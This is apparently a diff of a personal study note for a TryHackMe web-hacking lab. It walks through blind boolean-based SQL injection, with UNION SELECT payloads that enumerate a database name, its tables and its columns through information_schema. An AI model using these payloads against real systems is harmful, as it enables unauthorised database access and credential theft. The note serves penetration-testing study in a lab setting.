clydebuilt1974/TryHackMe/Junior Penetration Tester/Introduction to Web Hacking/Structured Query Language Injection.md

 admin123' UNION SELECT 1,2,3 where database() like 's%';--
 ```
 * Move onto the next character of the database name until another `true` response is received, for example, 'sa%', 'sb%', 'sc%' etc.
-* Keep on with this process until all the characters of the database name are discovered, which is `sqli_three`.
+* Continue with this process until all the characters of the database name are discovered, which is `sqli_three`.
-* The database name is now established, which can now be used to enumerate table names using a similar method by utilising the `information_schema` database.
+* The database name is now known, which can now be used to enumerate table names using a similar method by utilising the `information_schema` database.
-* Set the `username` to the following value:
+* Set the username to the following value:
 ```
 admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name like 'a%';--
 ```
 * This query looks for results in the `information_schema` database in the `tables` table where the database name matches `sqli_three`, and the table name begins with the letter `a`.
-* As the above query results in a `false` response, this confirms that there are no tables in the `sqli_three` database that begin with the letter `a`.
+* The above query results in a `false` response to confirm that there are no tables in the `sqli_three` database that begin with the letter `a`.
-* Like previously, cycle through letters, numbers and characters until a positive match is found.
+* Cycle through letters, numbers and characters until a positive match is found.
 * A table will be discovered in the `sqli_three` database named `users`, which can be confirmed by running the following username payload:
 ```
 admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name='users';--
 ```
 * Now need to enumerate the column names in the `users` table to properly search it for login credentials.
-* Uing the `information_schema` database and the information already gained, start querying it for column names.
 * Using the payload below, search the columns table where the database is equal to `sqli_three`, the table name is `users`, and the column name begins with the letter `a`.
 ```
 admin123' UNION SELECT 1,2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_three' and TABLE_NAME='users' and COLUMN_NAME like 'a%';
 ```
-* Again cycle through letters, numbers and characters until a match is found.
+* Cycle through letters, numbers and characters again until a match is found.
-* As multiple results are being searched for, add this to the payload each time a new column name is found, to prevent discovering the same one.
+* As multiple results are being searched for, add each new column name to the payload when found to prevent discovering the same one again.
   * For example, once the column named `id` is found, append that to the original payload (as seen below).
 ```
 admin123' UNION SELECT 1,2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_three' and TABLE_NAME='users' and COLUMN_NAME like 'a%' and COLUMN_NAME !='id';